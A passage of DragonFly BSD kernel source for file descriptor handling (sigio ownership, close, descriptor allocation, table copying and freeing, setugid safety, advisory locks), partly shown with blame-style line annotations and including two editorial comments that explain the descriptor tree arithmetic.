523 fdp->fd_holdleaderscount--;
524 if (fdp->fd_holdleaderscount == 0 &&
525 fdp->fd_holdleaderswakeup != 0) {
526 fdp->fd_holdleaderswakeup = 0;
527 wakeup(&fdp->fd_holdleaderscount);
528 }
529 }
530 }
531 return (0);
532}
533
534/*
535 * If sigio is on the list associated with a process or process group,
536 * disable signalling from the device, remove sigio from the list and
537 * free sigio.
538 */
539void
7bf8660a 540funsetown(struct sigio *sigio)
984263bc 541{
984263bc
MD
542 if (sigio == NULL)
543 return;
e43a034f 544 crit_enter();
984263bc 545 *(sigio->sio_myref) = NULL;
e43a034f 546 crit_exit();
984263bc
MD
547 if (sigio->sio_pgid < 0) {
548 SLIST_REMOVE(&sigio->sio_pgrp->pg_sigiolst, sigio,
549 sigio, sio_pgsigio);
550 } else /* if ((*sigiop)->sio_pgid > 0) */ {
551 SLIST_REMOVE(&sigio->sio_proc->p_sigiolst, sigio,
552 sigio, sio_pgsigio);
553 }
554 crfree(sigio->sio_ucred);
7bf8660a 555 free(sigio, M_SIGIO);
984263bc
MD
556}
557
558/* Free a list of sigio structures. */
559void
7bf8660a 560funsetownlst(struct sigiolst *sigiolst)
984263bc
MD
561{
562 struct sigio *sigio;
563
564 while ((sigio = SLIST_FIRST(sigiolst)) != NULL)
565 funsetown(sigio);
566}
567
/*
 * This is common code for FIOSETOWN ioctl called by fcntl(fd, F_SETOWN, arg).
 *
 * After permission checking, add a sigio structure to the sigio list for
 * the process or process group.
 */
int
fsetown(pid_t pgid, struct sigio **sigiop)
{
	struct proc *proc;
	struct pgrp *pgrp;
	struct sigio *sigio;

	if (pgid == 0) {
		funsetown(*sigiop);
		return (0);
	}
	if (pgid > 0) {
		proc = pfind(pgid);
		if (proc == NULL)
			return (ESRCH);

		/*
		 * Policy - Don't allow a process to FSETOWN a process
		 * in another session.
		 *
		 * Remove this test to allow maximum flexibility or
		 * restrict FSETOWN to the current process or process
		 * group for maximum safety.
		 */
		if (proc->p_session != curproc->p_session)
			return (EPERM);

		pgrp = NULL;
	} else /* if (pgid < 0) */ {
		pgrp = pgfind(-pgid);
		if (pgrp == NULL)
			return (ESRCH);

		/*
		 * Policy - Don't allow a process to FSETOWN a process
		 * in another session.
		 *
		 * Remove this test to allow maximum flexibility or
		 * restrict FSETOWN to the current process or process
		 * group for maximum safety.
		 */
		if (pgrp->pg_session != curproc->p_session)
			return (EPERM);

		proc = NULL;
	}
	funsetown(*sigiop);
	sigio = malloc(sizeof(struct sigio), M_SIGIO, M_WAITOK);
	if (pgid > 0) {
		SLIST_INSERT_HEAD(&proc->p_sigiolst, sigio, sio_pgsigio);
		sigio->sio_proc = proc;
	} else {
		SLIST_INSERT_HEAD(&pgrp->pg_sigiolst, sigio, sio_pgsigio);
		sigio->sio_pgrp = pgrp;
	}
	sigio->sio_pgid = pgid;
	sigio->sio_ucred = crhold(curproc->p_ucred);
	/* It would be convenient if p_ruid was in ucred. */
	sigio->sio_ruid = curproc->p_ucred->cr_ruid;
	sigio->sio_myref = sigiop;
	crit_enter();
	*sigiop = sigio;
	crit_exit();
	return (0);
}

/*
 * This is common code for FIOGETOWN ioctl called by fcntl(fd, F_GETOWN, arg).
 */
pid_t
fgetown(struct sigio *sigio)
{
	return (sigio != NULL ? sigio->sio_pgid : 0);
}

/*
 * Close many file descriptors.
 */
/* ARGSUSED */
int
closefrom(struct closefrom_args *uap)
{
	return(kern_closefrom(uap->fd));
}

int
kern_closefrom(int fd)
{
	struct thread *td = curthread;
	struct proc *p = td->td_proc;
	struct filedesc *fdp;

	KKASSERT(p);
	fdp = p->p_fd;

	if (fd < 0 || fd > fdp->fd_lastfile)
		return (0);

	do {
		if (kern_close(fdp->fd_lastfile) == EINTR)
			return (EINTR);
	} while (fdp->fd_lastfile > fd);

	return (0);
}

/*
 * Close a file descriptor.
 */
/* ARGSUSED */
int
close(struct close_args *uap)
{
	return(kern_close(uap->fd));
}

int
kern_close(int fd)
{
	struct thread *td = curthread;
	struct proc *p = td->td_proc;
	struct filedesc *fdp;
	struct file *fp;
	int error;
	int holdleaders;

	KKASSERT(p);
	fdp = p->p_fd;

	if ((unsigned)fd >= fdp->fd_nfiles ||
	    (fp = fdp->fd_files[fd].fp) == NULL)
		return (EBADF);
#if 0
	if (fdp->fd_files[fd].fileflags & UF_MAPPED)
		(void) munmapfd(p, fd);
#endif
	funsetfd(fdp, fd);
	holdleaders = 0;
	if (p->p_fdtol != NULL) {
		/*
		 * Ask fdfree() to sleep to ensure that all relevant
		 * process leaders can be traversed in closef().
		 */
		fdp->fd_holdleaderscount++;
		holdleaders = 1;
	}

	/*
	 * we now hold the fp reference that used to be owned by the
	 * descriptor array.
	 */
	while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
		fdp->fd_lastfile--;
	if (fd < fdp->fd_knlistsize)
		knote_fdclose(p, fd);
	error = closef(fp, td);
	if (holdleaders) {
		fdp->fd_holdleaderscount--;
		if (fdp->fd_holdleaderscount == 0 &&
		    fdp->fd_holdleaderswakeup != 0) {
			fdp->fd_holdleaderswakeup = 0;
			wakeup(&fdp->fd_holdleaderscount);
		}
	}
	return (error);
}

int
kern_fstat(int fd, struct stat *ub)
{
	struct thread *td = curthread;
	struct proc *p = td->td_proc;
	struct filedesc *fdp;
	struct file *fp;
	int error;

	KKASSERT(p);

	fdp = p->p_fd;
	if ((unsigned)fd >= fdp->fd_nfiles ||
	    (fp = fdp->fd_files[fd].fp) == NULL)
		return (EBADF);
	fhold(fp);
	error = fo_stat(fp, ub, td);
	fdrop(fp, td);

	return (error);
}

/*
 * Return status information about a file descriptor.
 */
int
fstat(struct fstat_args *uap)
{
	struct stat st;
	int error;

	error = kern_fstat(uap->fd, &st);

	if (error == 0)
		error = copyout(&st, uap->sb, sizeof(st));
	return (error);
}

/*
 * XXX: This is for source compatibility with NetBSD.  Probably doesn't
 * belong here.
 */
int
nfstat(struct nfstat_args *uap)
{
	struct stat st;
	struct nstat nst;
	int error;

	error = kern_fstat(uap->fd, &st);

	if (error == 0) {
		cvtnstat(&st, &nst);
		error = copyout(&nst, uap->sb, sizeof (nst));
	}
	return (error);
}

/*
 * Return pathconf information about a file descriptor.
 */
/* ARGSUSED */
int
fpathconf(struct fpathconf_args *uap)
{
	struct thread *td = curthread;
	struct proc *p = td->td_proc;
	struct filedesc *fdp;
	struct file *fp;
	struct vnode *vp;
	int error = 0;

	KKASSERT(p);
	fdp = p->p_fd;
	if ((unsigned)uap->fd >= fdp->fd_nfiles ||
	    (fp = fdp->fd_files[uap->fd].fp) == NULL)
		return (EBADF);

	fhold(fp);

	switch (fp->f_type) {
	case DTYPE_PIPE:
	case DTYPE_SOCKET:
		if (uap->name != _PC_PIPE_BUF) {
			error = EINVAL;
		} else {
			uap->sysmsg_result = PIPE_BUF;
			error = 0;
		}
		break;
	case DTYPE_FIFO:
	case DTYPE_VNODE:
		vp = (struct vnode *)fp->f_data;
		error = VOP_PATHCONF(vp, uap->name, uap->sysmsg_fds);
		break;
	default:
		error = EOPNOTSUPP;
		break;
	}
	fdrop(fp, td);
	return(error);
}

static int fdexpand;
SYSCTL_INT(_debug, OID_AUTO, fdexpand, CTLFLAG_RD, &fdexpand, 0, "");

static void
fdgrow(struct filedesc *fdp, int want)
{
	struct fdnode *newfiles;
	struct fdnode *oldfiles;
	int nf, extra;

	nf = fdp->fd_nfiles;
	do {
		/* nf has to be of the form 2^n - 1 */
		nf = 2 * nf + 1;
	} while (nf <= want);

	newfiles = malloc(nf * sizeof(struct fdnode), M_FILEDESC, M_WAITOK);

	/*
	 * deal with file-table extend race that might have occurred
	 * when malloc was blocked.
	 */
	if (fdp->fd_nfiles >= nf) {
		free(newfiles, M_FILEDESC);
		return;
	}
	/*
	 * Copy the existing ofile and ofileflags arrays
	 * and zero the new portion of each array.
	 */
	extra = nf - fdp->fd_nfiles;
	bcopy(fdp->fd_files, newfiles, fdp->fd_nfiles * sizeof(struct fdnode));
	bzero(&newfiles[fdp->fd_nfiles], extra * sizeof(struct fdnode));

	oldfiles = fdp->fd_files;
	fdp->fd_files = newfiles;
	fdp->fd_nfiles = nf;

	if (oldfiles != fdp->fd_builtin_files)
		free(oldfiles, M_FILEDESC);
	fdexpand++;
}

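/*
 * Illustrative note (editorial, not from the original source): because
 * the loop in fdgrow() computes nf = 2 * nf + 1, a starting table size
 * of the form 2^n - 1 (e.g. 15) yields the sequence
 *
 *	15 -> 31 -> 63 -> 127 -> ...
 *
 * so every table size stays of the form 2^n - 1, which is the shape
 * the in-place fd tree below depends on.
 */
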
/*
 * Number of nodes in right subtree, including the root.
 */
static __inline int
right_subtree_size(int n)
{
	return (n ^ (n | (n + 1)));
}

/*
 * Bigger ancestor.
 */
static __inline int
right_ancestor(int n)
{
	return (n | (n + 1));
}

/*
 * Smaller ancestor.
 */
static __inline int
left_ancestor(int n)
{
	return ((n & (n + 1)) - 1);
}

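/*
 * Worked example (editorial, not from the original source): for
 * descriptor 5 (binary 101),
 *
 *	left_ancestor(5)  == (5 & 6) - 1 == 3
 *	right_ancestor(5) == (5 | 6)     == 7
 *	right_subtree_size(3) == 3 ^ (3 | 4) == 4	(nodes 3,4,5,6)
 *
 * so fdreserve(fdp, 5, 1) below bumps the allocated counts at nodes
 * 5 and 3 and then stops, since left_ancestor(3) == (3 & 4) - 1 == -1.
 */
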
void
fdreserve(struct filedesc *fdp, int fd, int incr)
{
	while (fd >= 0) {
		fdp->fd_files[fd].allocated += incr;
		KKASSERT(fdp->fd_files[fd].allocated >= 0);
		fd = left_ancestor(fd);
	}
}

/*
 * Allocate a file descriptor for the process.
 */
int
fdalloc(struct proc *p, int want, int *result)
{
	struct filedesc *fdp = p->p_fd;
	int fd, rsize, rsum, node, lim;

	lim = min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
	if (want >= lim)
		return (EMFILE);
	if (want >= fdp->fd_nfiles)
		fdgrow(fdp, want);

	/*
	 * Search for a free descriptor starting at the higher
	 * of want or fd_freefile.  If that fails, consider
	 * expanding the ofile array.
	 */
retry:
	/* move up the tree looking for a subtree with a free node */
	for (fd = max(want, fdp->fd_freefile); fd < min(fdp->fd_nfiles, lim);
	     fd = right_ancestor(fd)) {
		if (fdp->fd_files[fd].allocated == 0)
			goto found;

		rsize = right_subtree_size(fd);
		if (fdp->fd_files[fd].allocated == rsize)
			continue;	/* right subtree full */

		/*
		 * Free fd is in the right subtree of the tree rooted at fd.
		 * Call that subtree R.  Look for the smallest (leftmost)
		 * subtree of R with an unallocated fd: continue moving
		 * down the left branch until encountering a full left
		 * subtree, then move to the right.
		 */
		for (rsum = 0, rsize /= 2; rsize > 0; rsize /= 2) {
			node = fd + rsize;
			rsum += fdp->fd_files[node].allocated;
			if (fdp->fd_files[fd].allocated == rsum + rsize) {
				fd = node;	/* move to the right */
				if (fdp->fd_files[node].allocated == 0)
					goto found;
				rsum = 0;
			}
		}
		goto found;
	}

	/*
	 * No space in current array.  Expand?
	 */
	if (fdp->fd_nfiles >= lim)
		return (EMFILE);
	fdgrow(fdp, want);
	goto retry;

found:
	KKASSERT(fd < fdp->fd_nfiles);
	fdp->fd_files[fd].fileflags = 0;
	if (fd > fdp->fd_lastfile)
		fdp->fd_lastfile = fd;
	if (want <= fdp->fd_freefile)
		fdp->fd_freefile = fd;
	*result = fd;
	KKASSERT(fdp->fd_files[fd].fp == NULL);
	fdreserve(fdp, fd, 1);
	return (0);
}

/*
 * Check to see whether n user file descriptors
 * are available to the process p.
 */
int
fdavail(struct proc *p, int n)
{
	struct filedesc *fdp = p->p_fd;
	struct fdnode *fdnode;
	int i, lim, last;

	lim = min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
	if ((i = lim - fdp->fd_nfiles) > 0 && (n -= i) <= 0)
		return (1);

	last = min(fdp->fd_nfiles, lim);
	fdnode = &fdp->fd_files[fdp->fd_freefile];
	for (i = last - fdp->fd_freefile; --i >= 0; ++fdnode) {
		if (fdnode->fp == NULL && --n <= 0)
			return (1);
	}
	return (0);
}

/*
 * falloc:
 *	Create a new open file structure and allocate a file descriptor
 *	for the process that refers to it.  If p is NULL, no descriptor
 *	is allocated and the file pointer is returned unassociated with
 *	any process.  resultfd is only used if p is not NULL and may
 *	separately be NULL indicating that you don't need the returned fd.
 *
 *	A held file pointer is returned.  If a descriptor has been allocated
 *	an additional hold on the fp will be made due to the fd_files[]
 *	reference.
 */
int
falloc(struct proc *p, struct file **resultfp, int *resultfd)
{
	static struct timeval lastfail;
	static int curfail;
	struct file *fp;
	int error;

	fp = NULL;

	/*
	 * Handle filetable full issues and root overfill.
	 */
	if (nfiles >= maxfiles - maxfilesrootres &&
	    ((p && p->p_ucred->cr_ruid != 0) || nfiles >= maxfiles)) {
		if (ppsratecheck(&lastfail, &curfail, 1)) {
			printf("kern.maxfiles limit exceeded by uid %d, please see tuning(7).\n",
				(p ? p->p_ucred->cr_ruid : -1));
		}
		error = ENFILE;
		goto done;
	}

	/*
	 * Allocate a new file descriptor.
	 */
	nfiles++;
	fp = malloc(sizeof(struct file), M_FILE, M_WAITOK | M_ZERO);
	fp->f_count = 1;
	fp->f_ops = &badfileops;
	fp->f_seqcount = 1;
	if (p)
		fp->f_cred = crhold(p->p_ucred);
	else
		fp->f_cred = crhold(proc0.p_ucred);
	LIST_INSERT_HEAD(&filehead, fp, f_list);
	if (resultfd) {
		if ((error = fsetfd(p, fp, resultfd)) != 0) {
			fdrop(fp, p->p_thread);
			fp = NULL;
		}
	} else {
		error = 0;
	}
done:
	*resultfp = fp;
	return (error);
}

/*
 * Associate a file pointer with a file descriptor.  On success the fp
 * will have an additional ref representing the fd_files[] association.
 */
int
fsetfd(struct proc *p, struct file *fp, int *resultfd)
{
	int fd, error;

	fd = -1;
	if ((error = fdalloc(p, 0, &fd)) == 0) {
		fhold(fp);
		p->p_fd->fd_files[fd].fp = fp;
	}
	*resultfd = fd;
	return (0);
}

void
funsetfd(struct filedesc *fdp, int fd)
{
	fdp->fd_files[fd].fp = NULL;
	fdp->fd_files[fd].fileflags = 0;
	fdreserve(fdp, fd, -1);
	if (fd < fdp->fd_freefile)
		fdp->fd_freefile = fd;
}

void
fsetcred(struct file *fp, struct ucred *cr)
{
	crhold(cr);
	crfree(fp->f_cred);
	fp->f_cred = cr;
}

/*
 * Free a file descriptor.
 */
void
ffree(struct file *fp)
{
	KASSERT((fp->f_count == 0), ("ffree: fp_fcount not 0!"));
	LIST_REMOVE(fp, f_list);
	crfree(fp->f_cred);
	if (fp->f_ncp) {
		cache_drop(fp->f_ncp);
		fp->f_ncp = NULL;
	}
	nfiles--;
	free(fp, M_FILE);
}

/*
 * Build a new filedesc structure.
 */
struct filedesc *
fdinit(struct proc *p)
{
	struct filedesc *newfdp;
	struct filedesc *fdp = p->p_fd;

	newfdp = malloc(sizeof(struct filedesc), M_FILEDESC, M_WAITOK|M_ZERO);
	if (fdp->fd_cdir) {
		newfdp->fd_cdir = fdp->fd_cdir;
		vref(newfdp->fd_cdir);
		newfdp->fd_ncdir = cache_hold(fdp->fd_ncdir);
	}

	/*
	 * rdir may not be set in e.g. proc0 or anything vm_fork'd off of
	 * proc0, but should unconditionally exist in other processes.
	 */
	if (fdp->fd_rdir) {
		newfdp->fd_rdir = fdp->fd_rdir;
		vref(newfdp->fd_rdir);
		newfdp->fd_nrdir = cache_hold(fdp->fd_nrdir);
	}
	if (fdp->fd_jdir) {
		newfdp->fd_jdir = fdp->fd_jdir;
		vref(newfdp->fd_jdir);
		newfdp->fd_njdir = cache_hold(fdp->fd_njdir);
	}

	/* Create the file descriptor table. */
	newfdp->fd_refcnt = 1;
	newfdp->fd_cmask = cmask;
	newfdp->fd_files = newfdp->fd_builtin_files;
	newfdp->fd_nfiles = NDFILE;
	newfdp->fd_knlistsize = -1;

	return (newfdp);
}

/*
 * Share a filedesc structure.
 */
struct filedesc *
fdshare(struct proc *p)
{
	p->p_fd->fd_refcnt++;
	return (p->p_fd);
}

/*
 * Copy a filedesc structure.
 */
struct filedesc *
fdcopy(struct proc *p)
{
	struct filedesc *newfdp, *fdp = p->p_fd;
	struct fdnode *fdnode;
	int i;

	/* Certain daemons might not have file descriptors. */
	if (fdp == NULL)
		return (NULL);

	newfdp = malloc(sizeof(struct filedesc), M_FILEDESC, M_WAITOK);
	*newfdp = *fdp;
	if (newfdp->fd_cdir) {
		vref(newfdp->fd_cdir);
		newfdp->fd_ncdir = cache_hold(newfdp->fd_ncdir);
	}
	/*
	 * We must check for fd_rdir here, at least for now because
	 * the init process is created before we have access to the
	 * rootvnode to take a reference to it.
	 */
	if (newfdp->fd_rdir) {
		vref(newfdp->fd_rdir);
		newfdp->fd_nrdir = cache_hold(newfdp->fd_nrdir);
	}
	if (newfdp->fd_jdir) {
		vref(newfdp->fd_jdir);
		newfdp->fd_njdir = cache_hold(newfdp->fd_njdir);
	}
	newfdp->fd_refcnt = 1;

	/*
	 * If the number of open files fits in the internal arrays
	 * of the open file structure, use them, otherwise allocate
	 * additional memory for the number of descriptors currently
	 * in use.
	 */
	if (newfdp->fd_lastfile < NDFILE) {
		newfdp->fd_files = newfdp->fd_builtin_files;
		i = NDFILE;
	} else {
		/*
		 * Compute the smallest file table size
		 * for the file descriptors currently in use,
		 * allowing the table to shrink.
		 */
		i = newfdp->fd_nfiles;
		while ((i-1)/2 > newfdp->fd_lastfile && (i-1)/2 > NDFILE)
			i = (i-1)/2;
		newfdp->fd_files = malloc(i * sizeof(struct fdnode),
					  M_FILEDESC, M_WAITOK);
	}
	newfdp->fd_nfiles = i;

	if (fdp->fd_files != fdp->fd_builtin_files ||
	    newfdp->fd_files != newfdp->fd_builtin_files
	) {
		bcopy(fdp->fd_files, newfdp->fd_files,
		      i * sizeof(struct fdnode));
	}

	/*
	 * kq descriptors cannot be copied.
	 */
	if (newfdp->fd_knlistsize != -1) {
		fdnode = &newfdp->fd_files[newfdp->fd_lastfile];
		for (i = newfdp->fd_lastfile; i >= 0; i--, fdnode--) {
			if (fdnode->fp != NULL && fdnode->fp->f_type == DTYPE_KQUEUE)
				funsetfd(newfdp, i);	/* nulls out *fpp */
			if (fdnode->fp == NULL && i == newfdp->fd_lastfile && i > 0)
				newfdp->fd_lastfile--;
		}
		newfdp->fd_knlist = NULL;
		newfdp->fd_knlistsize = -1;
		newfdp->fd_knhash = NULL;
		newfdp->fd_knhashmask = 0;
	}

	fdnode = newfdp->fd_files;
	for (i = newfdp->fd_lastfile; i-- >= 0; fdnode++) {
		if (fdnode->fp != NULL)
			fhold(fdnode->fp);
	}
	return (newfdp);
}

/*
 * Release a filedesc structure.
 */
void
fdfree(struct proc *p)
{
	struct thread *td = p->p_thread;
	struct filedesc *fdp = p->p_fd;
	struct fdnode *fdnode;
	int i;
	struct filedesc_to_leader *fdtol;
	struct file *fp;
	struct vnode *vp;
	struct flock lf;

	/* Certain daemons might not have file descriptors. */
	if (fdp == NULL)
		return;

	/* Check for special need to clear POSIX style locks */
	fdtol = p->p_fdtol;
	if (fdtol != NULL) {
		KASSERT(fdtol->fdl_refcount > 0,
			("filedesc_to_refcount botch: fdl_refcount=%d",
			 fdtol->fdl_refcount));
		if (fdtol->fdl_refcount == 1 &&
		    (p->p_leader->p_flag & P_ADVLOCK) != 0) {
			i = 0;
			fdnode = fdp->fd_files;
			for (i = 0; i <= fdp->fd_lastfile; i++, fdnode++) {
				if (fdnode->fp == NULL ||
				    fdnode->fp->f_type != DTYPE_VNODE)
					continue;
				fp = fdnode->fp;
				fhold(fp);
				lf.l_whence = SEEK_SET;
				lf.l_start = 0;
				lf.l_len = 0;
				lf.l_type = F_UNLCK;
				vp = (struct vnode *)fp->f_data;
				(void) VOP_ADVLOCK(vp,
						   (caddr_t)p->p_leader,
						   F_UNLCK,
						   &lf,
						   F_POSIX);
				fdrop(fp, p->p_thread);
				/* reload due to possible reallocation */
				fdnode = &fdp->fd_files[i];
			}
		}
	retry:
		if (fdtol->fdl_refcount == 1) {
			if (fdp->fd_holdleaderscount > 0 &&
			    (p->p_leader->p_flag & P_ADVLOCK) != 0) {
				/*
				 * close() or do_dup() has cleared a reference
				 * in a shared file descriptor table.
				 */
				fdp->fd_holdleaderswakeup = 1;
				tsleep(&fdp->fd_holdleaderscount,
				       0, "fdlhold", 0);
				goto retry;
			}
			if (fdtol->fdl_holdcount > 0) {
				/*
				 * Ensure that fdtol->fdl_leader
				 * remains valid in closef().
				 */
				fdtol->fdl_wakeup = 1;
				tsleep(fdtol, 0, "fdlhold", 0);
				goto retry;
			}
		}
		fdtol->fdl_refcount--;
		if (fdtol->fdl_refcount == 0 &&
		    fdtol->fdl_holdcount == 0) {
			fdtol->fdl_next->fdl_prev = fdtol->fdl_prev;
			fdtol->fdl_prev->fdl_next = fdtol->fdl_next;
		} else
			fdtol = NULL;
		p->p_fdtol = NULL;
		if (fdtol != NULL)
			free(fdtol, M_FILEDESC_TO_LEADER);
	}
	if (--fdp->fd_refcnt > 0)
		return;
	/*
	 * we are the last reference to the structure, we can
	 * safely assume it will not change out from under us.
	 */
	for (i = 0; i <= fdp->fd_lastfile; ++i) {
		if (fdp->fd_files[i].fp)
			closef(fdp->fd_files[i].fp, td);
	}
	if (fdp->fd_files != fdp->fd_builtin_files)
		free(fdp->fd_files, M_FILEDESC);
	if (fdp->fd_cdir) {
		cache_drop(fdp->fd_ncdir);
		vrele(fdp->fd_cdir);
	}
	if (fdp->fd_rdir) {
		cache_drop(fdp->fd_nrdir);
		vrele(fdp->fd_rdir);
	}
	if (fdp->fd_jdir) {
		cache_drop(fdp->fd_njdir);
		vrele(fdp->fd_jdir);
	}
	if (fdp->fd_knlist)
		free(fdp->fd_knlist, M_KQUEUE);
	if (fdp->fd_knhash)
		free(fdp->fd_knhash, M_KQUEUE);
	free(fdp, M_FILEDESC);
}

/*
 * For setugid programs, we don't want people to use their setugidness
 * to generate error messages which write to a file which would
 * otherwise be off-limits to the process.
 *
 * This is a gross hack to plug the hole.  A better solution would involve
 * a special vop or other form of generalized access control mechanism.  We
 * go ahead and just reject all procfs file systems accesses as dangerous.
 *
 * Since setugidsafety calls this only for fd 0, 1 and 2, this check is
 * sufficient.  We also don't check for setugidness since we know we are.
 */
static int
is_unsafe(struct file *fp)
{
	if (fp->f_type == DTYPE_VNODE &&
	    ((struct vnode *)(fp->f_data))->v_tag == VT_PROCFS)
		return (1);
	return (0);
}

/*
 * Make this setugid thing safe, if at all possible.
 */
void
setugidsafety(struct proc *p)
{
	struct thread *td = p->p_thread;
	struct filedesc *fdp = p->p_fd;
	int i;

	/* Certain daemons might not have file descriptors. */
	if (fdp == NULL)
		return;

	/*
	 * note: fdp->fd_files may be reallocated out from under us while
	 * we are blocked in a close.  Be careful!
	 */
	for (i = 0; i <= fdp->fd_lastfile; i++) {
		if (i > 2)
			break;
		if (fdp->fd_files[i].fp && is_unsafe(fdp->fd_files[i].fp)) {
			struct file *fp;

#if 0
			if ((fdp->fd_files[i].fileflags & UF_MAPPED) != 0)
				(void) munmapfd(p, i);
#endif
			if (i < fdp->fd_knlistsize)
				knote_fdclose(p, i);
			/*
			 * NULL-out descriptor prior to close to avoid
			 * a race while close blocks.
			 */
			fp = fdp->fd_files[i].fp;
			funsetfd(fdp, i);
			closef(fp, td);
		}
	}
	while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
		fdp->fd_lastfile--;
}

/*
 * Close any files on exec?
 */
void
fdcloseexec(struct proc *p)
{
	struct thread *td = p->p_thread;
	struct filedesc *fdp = p->p_fd;
	int i;

	/* Certain daemons might not have file descriptors. */
	if (fdp == NULL)
		return;

	/*
	 * We cannot cache fd_files since operations may block and rip
	 * them out from under us.
	 */
	for (i = 0; i <= fdp->fd_lastfile; i++) {
		if (fdp->fd_files[i].fp != NULL &&
		    (fdp->fd_files[i].fileflags & UF_EXCLOSE)) {
			struct file *fp;

#if 0
			if (fdp->fd_files[i].fileflags & UF_MAPPED)
				(void) munmapfd(p, i);
#endif
			if (i < fdp->fd_knlistsize)
				knote_fdclose(p, i);
			/*
			 * NULL-out descriptor prior to close to avoid
			 * a race while close blocks.
			 */
			fp = fdp->fd_files[i].fp;
			funsetfd(fdp, i);
			closef(fp, td);
		}
	}
	while (fdp->fd_lastfile > 0 && fdp->fd_files[fdp->fd_lastfile].fp == NULL)
		fdp->fd_lastfile--;
}

/*
 * It is unsafe for set[ug]id processes to be started with file
 * descriptors 0..2 closed, as these descriptors are given implicit
 * significance in the Standard C library.  fdcheckstd() will create a
 * descriptor referencing /dev/null for each of stdin, stdout, and
 * stderr that is not already open.
 */
int
fdcheckstd(struct proc *p)
{
	struct thread *td = p->p_thread;
	struct nlookupdata nd;
	struct filedesc *fdp;
	struct file *fp;
	register_t retval;
	int fd, i, error, flags, devnull;

	fdp = p->p_fd;
	if (fdp == NULL)
		return (0);
	devnull = -1;
	error = 0;
	for (i = 0; i < 3; i++) {
		if (fdp->fd_files[i].fp != NULL)
			continue;
		if (devnull < 0) {
			if ((error = falloc(p, &fp, NULL)) != 0)
				break;

			error = nlookup_init(&nd, "/dev/null", UIO_SYSSPACE,
					     NLC_FOLLOW|NLC_LOCKVP);
			flags = FREAD | FWRITE;
			if (error == 0)
				error = vn_open(&nd, fp, flags, 0);
			if (error == 0)
				error = fsetfd(p, fp, &fd);
			fdrop(fp, td);
			nlookup_done(&nd);
			if (error)
				break;
			KKASSERT(i == fd);
			devnull = fd;
		} else {
			error = kern_dup(DUP_FIXED, devnull, i, &retval);
			if (error != 0)
				break;
		}
	}
	return (error);
}

/*
 * Internal form of close.
 * Decrement reference count on file structure.
 * Note: td and/or p may be NULL when closing a file
 * that was being passed in a message.
 */
int
closef(struct file *fp, struct thread *td)
{
	struct vnode *vp;
	struct flock lf;
	struct filedesc_to_leader *fdtol;
	struct proc *p;

	if (fp == NULL)
		return (0);
	if (td == NULL) {
		td = curthread;
		p = NULL;	/* allow no proc association */
	} else {
		p = td->td_proc;	/* can also be NULL */
	}
	/*
	 * POSIX record locking dictates that any close releases ALL
	 * locks owned by this process.  This is handled by setting
	 * a flag in the unlock to free ONLY locks obeying POSIX
	 * semantics, and not to free BSD-style file locks.
	 * If the descriptor was in a message, POSIX-style locks
	 * aren't passed with the descriptor.
	 */
	if (p != NULL &&
	    fp->f_type == DTYPE_VNODE) {
		if ((p->p_leader->p_flag & P_ADVLOCK) != 0) {
			lf.l_whence = SEEK_SET;
			lf.l_start = 0;
			lf.l_len = 0;
			lf.l_type = F_UNLCK;
			vp = (struct vnode *)fp->f_data;
			(void) VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_UNLCK,
					   &lf, F_POSIX);
		}
		fdtol = p->p_fdtol;
		if (fdtol != NULL) {
			/*
			 * Handle special case where file descriptor table
			 * is shared between multiple process leaders.
			 */
			for (fdtol = fdtol->fdl_next;
			     fdtol != p->p_fdtol;
			     fdtol = fdtol->fdl_next) {
				if ((fdtol->fdl_leader->p_flag &
				     P_ADVLOCK) == 0)
					continue;
				fdtol->fdl_holdcount++;
				lf.l_whence = SEEK_SET;
				lf.l_start = 0;
				lf.l_len = 0;
				lf.l_type = F_UNLCK;
				vp = (struct vnode *)fp->f_data;
				(void) VOP_ADVLOCK(vp,
						   (caddr_t)p->p_leader,
						   F_UNLCK, &lf, F_POSIX);
				fdtol->fdl_holdcount--;
				if (fdtol->fdl_holdcount == 0 &&
				    fdtol->fdl_wakeup != 0) {
					fdtol->fdl_wakeup = 0;
					wakeup(fdtol);
				}
			}
		}
	}
	return (fdrop(fp, td));
}

int
fdrop(struct file *fp, struct thread *td)
{
	struct flock lf;
	struct vnode *vp;
	int error;

	if (--fp->f_count > 0)
		return (0);
	if (fp->f_count < 0)
		panic("fdrop: count < 0");
	if ((fp->f_flag & FHASLOCK) && fp->f_type == DTYPE_VNODE) {
		lf.l_whence = SEEK_SET;
		lf.l_start = 0;
		lf.l_len = 0;
		lf.l_type = F_UNLCK;
		vp = (struct vnode *)fp->f_data;
		(void) VOP_ADVLOCK(vp, (caddr_t)fp, F_UNLCK, &lf, F_FLOCK);
	}
	if (fp->f_ops != &badfileops)
		error = fo_close(fp, td);
	else
		error = 0;
	ffree(fp);
	return (error);
}

/*
 * Apply an advisory lock on a file descriptor.
 *
 * Just attempt to get a record lock of the requested type on
 * the entire file (l_whence = SEEK_SET, l_start = 0, l_len = 0).
 */
/* ARGSUSED */
int
flock(struct flock_args *uap)
{
	struct proc *p = curproc;
	struct filedesc *fdp = p->p_fd;
	struct file *fp;
	struct vnode *vp;
	struct flock lf;

	if ((unsigned)uap->fd >= fdp->fd_nfiles ||
	    (fp = fdp->fd_files[uap->fd].fp) == NULL)
		return (EBADF);
	if (fp->f_type != DTYPE_VNODE)
		return (EOPNOTSUPP);
	vp = (struct vnode *)fp->f_data;
	lf.l_whence = SEEK_SET;
	lf.l_start = 0;
	lf.l_len = 0;
	if (uap->how & LOCK_UN) {
		lf.l_type = F_UNLCK;
		fp->f_flag &= ~FHASLOCK;
		return (VOP_ADVLOCK(vp, (caddr_t)fp, F_UNLCK, &lf, F_FLOCK));
	}
	if (uap->how & LOCK_EX)
		lf.l_type = F_WRLCK;
	else if (uap->how & LOCK_SH)
		lf.l_type = F_RDLCK;
	else
		return (EBADF);
	fp->f_flag |= FHASLOCK;
	if (uap->how & LOCK_NB)
		return (VOP_ADVLOCK(vp, (caddr_t)fp, F_SETLK, &lf, F_FLOCK));
	return (VOP_ADVLOCK(vp, (caddr_t)fp, F_SETLK, &lf, F_FLOCK|F_WAIT));
}

/*
 * File Descriptor pseudo-device driver (/dev/fd/).
 *
 * Opening minor device N dup()s the file (if any) connected to file
 * descriptor N belonging to the calling process.  Note that this driver
